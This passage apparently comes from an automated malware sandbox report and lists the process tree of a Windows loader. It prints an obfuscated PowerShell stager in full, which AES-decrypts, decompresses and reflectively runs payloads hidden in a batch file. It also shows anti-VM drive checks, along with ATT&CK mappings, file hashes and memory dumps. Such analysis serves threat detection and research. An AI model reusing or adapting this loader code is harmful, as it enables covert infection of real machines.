yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));
    3⤵
    PID:1652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Deletes itself
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1708
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1708 -s 2380
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      PID:1488
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
      4⤵
      Drops file in Windows directory
      PID:5036
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
      4⤵
      PID:4740
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2468
    - - C:\Windows\system32\fsutil.exe
        
        fsutil fsinfo drives
        5⤵
        
        PID:2192
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
        5⤵
        
        PID:2156
    - - C:\Windows\system32\fsutil.exe
        
        fsutil fsinfo drives
        5⤵
        
        PID:5020
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
        5⤵
        
        PID:1364
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));
        5⤵
        
        PID:4080
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:1664
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1664 -s 2368
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:2848
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1664 -s 2448
        6⤵
        
        PID:4220
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        6⤵
        
        PID:3400
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1188
- C:\Windows\$nya-onimai2\tSVFjN.exe
  "C:\Windows\$nya-onimai2\tSVFjN.exe"
  2⤵
  - Executes dropped EXE
  PID:2752
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3460

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3892

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3952

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4092

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3772

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1484

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3096

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3156

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:1240

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3352
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 408 -p 1708 -ip 1708
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:2836
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 592 -p 1664 -ip 1664
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4644
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 444 -p 1664 -ip 1664
  2⤵
  PID:1152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.299ecee3-8088-45ca-875b-630a24d9f685.tmp.csv

Filesize
34KB

MD5
9f1c158f60f37f4839df66005f69a8e8

SHA1
ef19cdd6506541e0af846bbbb8335ea13862209f

SHA256
d35e2fdf351cda98af1bb1d06e0ea98fa9234cf94a11c5895caf198d314387e5

SHA512
7810855093216b862047323eb106d0d5efc0b10969362956d8d55e7a52ba898e5f036305fc96f886674119e1116ff51d7799729dcb32e5b273188f02c9a2ae91

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.2b7642b7-cc5c-491a-8d06-360c58096e98.tmp.txt

Filesize
13KB

MD5
537451fcbfd6c6b845536d72da3b24df

SHA1
505b12bbab46be46bbd02c38a4c91e781f04f887

SHA256
6ecf666e5cf9d4bf9b9e14258f6f93d674b086dd2f634221cfafb3b2541d6470

SHA512
04766ae851adb1b62b64abbf9927301630f9940a92fbe2bbd6d52d5255afdc631f47c48945a74e916f1c0a28be922083b04c53216cf5f169593f7abd208db23a

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.30ae0c4d-043c-4092-930f-69634669c918.tmp.csv

Filesize
35KB

MD5
b3564fc3dbb39fb80354f7c515d76600

SHA1
7b904269af67886a04d484688177ecc7e46ff892

SHA256
9baff86e19151a609cdb33c24ac99cbcef29ae42cbca6d580cfe17dae5d44626

SHA512
967cdb00d42d809a4b5e04e54cbf7da13db3c54e2697d7b69107d6a3089b7bb48ac63325d4ad4f724cea5194f7b156e536979e94399aed98eba96d0e578315fb

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ca72b6f1-db9c-4cd5-8997-2559e49a1274.tmp.txt

Filesize
13KB

MD5
7b551aa3e639d47e8aa91d9d56405e59

SHA1
460ad39c93c308c0b3a501c04c7b9d45a7351449

SHA256
99475ab6cb5d3f08fd31e056aa99e67509951763e1bdf2a46ebcc94d9b67dc92

SHA512
320c673bc1983821390250f0a4e07f4e1fe88f8dc989c1076eb16d6253389ae662170dbcd4c3e82281e8d2b6f544f6d387838f3b7988055fb3bcea583581dcfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
17a17db79c19d4aa20da768f2f11e0f6

SHA1
78a73b83c002d4f3b51b69fc3cdf9cf0167fedc1

SHA256
e9819d3ecd5796772aaeb07dc1c5da0563d3a1bf9422da03b0514b95ffad8289

SHA512
7a450bd6e8767e16345db6745f162de8e948fb7b65dc5aa1b27e9c395f7657a5fc8a6becbe7e5d332c3c7480783474936e6d21f6421454d8fbe35f2f946043be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
1KB

MD5
38d82e4dea1c1bf49bf8ec02767bf6c5

SHA1
d047341a619d44c61fe80a9591f87a3806699dee

SHA256
d753c949c37d2cdb08f9639a37f79c34c5c65eaebe6691bcae1b02d5585b6ee1

SHA512
e30c6cf10376b148552fdb69ad994a0369d6c121dc193b4e11dbd7f13004461fe7e292aa4eb1edd0325a8dd52c86f159bb0835e9331ecc0cd050c83935a4a2a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_egue0al4.1xt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$nya-onimai2\tSVFjN.exe

Filesize
36KB

MD5
b943a57bdf1bbd9c33ab0d33ff885983

SHA1
1cee65eea1ab27eae9108c081e18a50678bd5cdc

SHA256
878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4

SHA512
cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c

Download Submit
C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Filesize
7.3MB

MD5
1bec1098946595a03fa067a3ef7ce292

SHA1
89cfb4a2f8800f1b944d906d959639907672317d

SHA256
a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb

SHA512
dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082

Download Submit
memory/424-79-0x0000013E392F0000-0x0000013E3931A000-memory.dmp

Filesize
168KB

Download
memory/632-41-0x000002BB4C380000-0x000002BB4C3AA000-memory.dmp

Filesize
168KB

Download
memory/632-45-0x000002BB4C380000-0x000002BB4C3AA000-memory.dmp

Filesize
168KB

Download
memory/632-43-0x000002BB4C380000-0x000002BB4C3AA000-memory.dmp

Filesize
168KB

Download
memory/632-44-0x00007FF8A18F0000-0x00007FF8A1900000-memory.dmp

Filesize
64KB

Download
memory/632-40-0x000002BB4C380000-0x000002BB4C3AA000-memory.dmp

Filesize
168KB

Download
memory/632-33-0x000002BB4C380000-0x000002BB4C3AA000-memory.dmp

Filesize
168KB

Download
memory/632-34-0x000002BB4C380000-0x000002BB4C3AA000-memory.dmp

Filesize
168KB

Download
memory/632-39-0x000002BB4C380000-0x000002BB4C3AA000-memory.dmp

Filesize
168KB

Download
memory/632-32-0x000002BB4C350000-0x000002BB4C374000-memory.dmp

Filesize
144KB

Download
memory/632-42-0x000002BB4C380000-0x000002BB4C3AA000-memory.dmp

Filesize
168KB

Download
memory/684-58-0x0000028F37370000-0x0000028F3739A000-memory.dmp

Filesize
168KB

Download
memory/684-59-0x00007FF8A18F0000-0x00007FF8A1900000-memory.dmp

Filesize
64KB

Download
memory/684-49-0x0000028F37370000-0x0000028F3739A000-memory.dmp

Filesize
168KB

Download
memory/684-54-0x0000028F37370000-0x0000028F3739A000-memory.dmp

Filesize
168KB

Download
memory/684-55-0x0000028F37370000-0x0000028F3739A000-memory.dmp

Filesize
168KB

Download
memory/684-60-0x0000028F37370000-0x0000028F3739A000-memory.dmp

Filesize
168KB

Download
memory/684-56-0x0000028F37370000-0x0000028F3739A000-memory.dmp

Filesize
168KB

Download
memory/684-57-0x0000028F37370000-0x0000028F3739A000-memory.dmp

Filesize
168KB

Download
memory/988-73-0x000001F95ED20000-0x000001F95ED4A000-memory.dmp

Filesize
168KB

Download
memory/988-69-0x000001F95ED20000-0x000001F95ED4A000-memory.dmp

Filesize
168KB

Download
memory/988-64-0x000001F95ED20000-0x000001F95ED4A000-memory.dmp

Filesize
168KB

Download
memory/988-70-0x000001F95ED20000-0x000001F95ED4A000-memory.dmp

Filesize
168KB

Download
memory/988-71-0x000001F95ED20000-0x000001F95ED4A000-memory.dmp

Filesize
168KB

Download
memory/988-72-0x000001F95ED20000-0x000001F95ED4A000-memory.dmp

Filesize
168KB

Download
memory/988-74-0x00007FF8A18F0000-0x00007FF8A1900000-memory.dmp

Filesize
64KB

Download
memory/988-75-0x000001F95ED20000-0x000001F95ED4A000-memory.dmp

Filesize
168KB

Download
memory/1664-2111-0x00000250D2CE0000-0x00000250D3464000-memory.dmp

Filesize
7.5MB

Download
memory/1664-2200-0x00000250D3BF0000-0x00000250D3DB2000-memory.dmp

Filesize
1.8MB

Download
memory/1664-2199-0x00000250D0FF0000-0x00000250D10A2000-memory.dmp

Filesize
712KB

Download
memory/1664-2198-0x00000250D0EE0000-0x00000250D0F30000-memory.dmp

Filesize
320KB

Download
memory/1708-977-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-1231-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-9-0x0000028DC3CE0000-0x0000028DC3D02000-memory.dmp

Filesize
136KB

Download
memory/1708-10-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-11-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-12-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-13-0x0000028DC3DC0000-0x0000028DC3E06000-memory.dmp

Filesize
280KB

Download
memory/1708-888-0x00007FF8C0A13000-0x00007FF8C0A15000-memory.dmp

Filesize
8KB

Download
memory/1708-960-0x0000028DE4AB0000-0x0000028DE4E42000-memory.dmp

Filesize
3.6MB

Download
memory/1708-976-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-0-0x00007FF8C0A13000-0x00007FF8C0A15000-memory.dmp

Filesize
8KB

Download
memory/1708-978-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-980-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-14-0x0000028DC3940000-0x0000028DC397A000-memory.dmp

Filesize
232KB

Download
memory/1708-15-0x0000028DE4450000-0x0000028DE4896000-memory.dmp

Filesize
4.3MB

Download
memory/1708-24-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-18-0x00007FF8C0A10000-0x00007FF8C14D2000-memory.dmp

Filesize
10.8MB

Download
memory/1708-17-0x00007FF8E02E0000-0x00007FF8E039D000-memory.dmp

Filesize
756KB

Download
memory/1708-16-0x00007FF8E1860000-0x00007FF8E1A69000-memory.dmp

Filesize
2.0MB

Download
memory/2752-2635-0x000001F992F60000-0x000001F992F6E000-memory.dmp

Filesize
56KB

Download
memory/3912-19-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3912-23-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3912-28-0x00007FF8E02E0000-0x00007FF8E039D000-memory.dmp

Filesize
756KB

Download
memory/3912-29-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3912-27-0x00007FF8E1860000-0x00007FF8E1A69000-memory.dmp

Filesize
2.0MB

Download
memory/3912-26-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3912-21-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3912-20-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download